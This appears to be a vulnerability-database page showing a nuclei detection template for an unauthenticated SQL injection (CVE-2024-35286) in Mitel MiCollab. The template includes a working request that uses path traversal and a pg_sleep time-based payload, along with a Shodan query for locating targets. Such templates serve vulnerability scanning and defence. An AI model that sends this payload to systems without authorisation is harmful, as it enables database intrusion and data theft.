Lucene search
K

Mitel MiCollab <= 9.8.0.33 - SQL Injection

🗓️ 04 Jul 2026 03:00:48Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 33 Views

Unauthenticated SQL injection in Mitel MiCollab allows data access and database actions.

Related
Refs
Code
id: CVE-2024-35286

info:
  name: Mitel MiCollab <= 9.8.0.33 - SQL Injection
  author: daffainfo
  severity: critical
  description: |
    A vulnerability in NuPoint Messenger (NPM) of Mitel MiCollab through 9.8.0.33 allows an unauthenticated attacker to conduct a SQL injection attack due to insufficient sanitization of user input. A successful exploit could allow an attacker to access sensitive information and execute arbitrary database and management operations.
  impact: |
    Unauthenticated attackers can execute arbitrary SQL queries to access sensitive information and execute arbitrary database and management operations.
  remediation: |
    Update Mitel MiCollab to a version later than 9.8.0.33.
  reference:
    - https://www.mitel.com/support/security-advisories/mitel-product-security-advisory-24-0014
    - https://labs.watchtowr.com/where-theres-smoke-theres-fire-mitel-micollab-cve-2024-35286-cve-2024-41713-and-an-0day/
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2024-35286
    epss-score: 0.65559
    epss-percentile: 0.99167
    cwe-id: CWE-89
    cpe: cpe:2.3:a:mitel:micollab:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: mitel
    product: micollab
    shodan-query: html:"Mitel" html:"MiCollab"
  tags: cve,cve2024,mitel,micollab,sqli,vkev,vuln

http:
  - raw:
      - |
        @timeout: 20s
        POST /npm-pwg/..;/npm-admin/login.do HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        subAction=basicLogin&username=test'||pg_sleep(6)--&password=test&clusterIndex=0

    matchers:
      - type: dsl
        dsl:
          - 'duration >= 6'
          - 'status_code == 500'
          - 'contains_any(body, "com.mitel.npm.web.console", "java.lang.NullPointerException")'
          - 'contains(set_cookie, "JSESSIONID=")'
        condition: and
# digest: 4a0a0047304502204f67f1b4063ef856fb246a8db54a74d49f19b2d4fc3f4da8b943db9ff3988872022100fa0021e5dc744fdae206c99fc8ecc3919f6ae598a4a8b902bf49f1a9fda33b27:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
7.5High risk
Vulners AI Score7.5
CVSS 3.19.1 - 9.8
EPSS0.98067
SSVC
33